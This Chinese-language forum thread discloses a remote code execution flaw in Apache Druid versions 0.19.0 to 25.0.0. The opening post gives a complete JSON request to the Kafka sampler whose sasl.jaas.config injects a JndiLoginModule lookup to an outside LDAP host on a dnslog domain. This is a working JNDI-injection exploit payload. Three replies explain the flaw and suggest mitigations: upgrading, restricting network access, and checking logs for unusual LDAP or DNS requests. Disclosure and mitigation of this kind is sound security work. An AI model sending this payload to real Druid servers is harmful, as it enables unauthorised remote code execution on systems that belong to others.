Apache Druid远程代码执行漏洞
Apache Druid是一个高性能的实时大数据分析引擎,支持快速数据摄取、实时查询和数据可视化。它主要用于OLAP(在线分析处理)场景,能处理PB级别的数据。Druid具有高度可扩展、低延迟和高吞吐量的特点,广泛应用于实时监控、事件驱动分析、用户行为分析、网络安全等领域。通过使用Druid,企业和开发者可以快速获得实时分析结果,提升决策效率。影响版本
0.19.0 <= Apache Druid <= 25.0.0
不受影响版本
Apache Druid >= 26.0.0(修复版本尚未正式发布)
dnslog测试POC代码:
{
"type":"kafka",
"spec":{
"type":"kafka",
"ioConfig":{
"type":"kafka",
"consumerProperties":{
"bootstrap.servers":"6.6.6.6:9092",
"sasl.mechanism":"SCRAM-SHA-256",
"security.protocol":"SASL_SSL",
"sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://1nu5tj.dnslog.cn\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
},
"topic":"any",
"useEarliestOffset":true,
"inputFormat":{
"type":"regex",
"pattern":"([\\s\\S]*)",
"listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965",
"columns":[
"raw"
]
}
},
"dataSchema":{
"dataSource":"sample",
"timestampSpec":{
"column":"!!!_no_such_column_!!!",
"missingValue":"1970-01-01T00:00:00Z"
},
"dimensionsSpec":{
},
"granularitySpec":{
"rollup":false
}
},
"tuningConfig":{
"type":"kafka"
}
},
"samplerConfig":{
"numRows":500,
"timeoutMs":15000
}
}
Re: Apache Druid远程代码执行漏洞
感谢分享这个高危漏洞情报。0.19.0到25.0.0的范围影响面确实不小,POC里利用Kafka索引任务的JAAS配置触发JNDI注入,思路很清晰。在正式修复版本(26.0.0)出来之前,建议有条件的先禁用Kafka索引服务或者严格限制相关API的访问来源,避免被外部利用。楼主有更多关于漏洞成因或临时缓解措施的细节吗?Re: Apache Druid远程代码执行漏洞
感谢分享这个漏洞情报。这个 Apache Druid 远程代码执行漏洞影响范围比较广,0.19.0 到 25.0.0 都在风险内。从 POC 来看,是通过 Kafka 索引服务中的 JNDI 注入实现的,攻击者可以触发 LDAP 请求,进而可能导致远程代码执行。 建议还在使用受影响版本的用户: 1. 尽快关注官方修复版本(26.0.0 及以上)的发布,及时升级。 2. 如果暂时无法升级,可以考虑限制对 Druid 服务(特别是索引服务)的网络访问,避免暴露在公网。 3. 检查日志中是否有异常的 LDAP 或 DNS 请求。 另外提醒一下,POC 仅供安全测试和漏洞验证使用,不要在生产环境或未授权环境下运行。Re: Apache Druid远程代码执行漏洞
感谢分享这个漏洞信息。影响版本范围挺广的,0.19.0到25.0.0基本上覆盖了当前主要使用的版本。POC里利用的是Kafka索引服务中的JNDI注入,通过sasl.jaas.config构造LDAP查询触发dnslog,思路很清晰。不过在测试时要注意环境安全,别在生产系统上直接跑。官方修复版本26.0.0还没正式发布,目前建议先检查是否开启了对外的Kafka索引服务接口,或者通过网络策略限制访问来源,降低被利用风险。
页:
[1]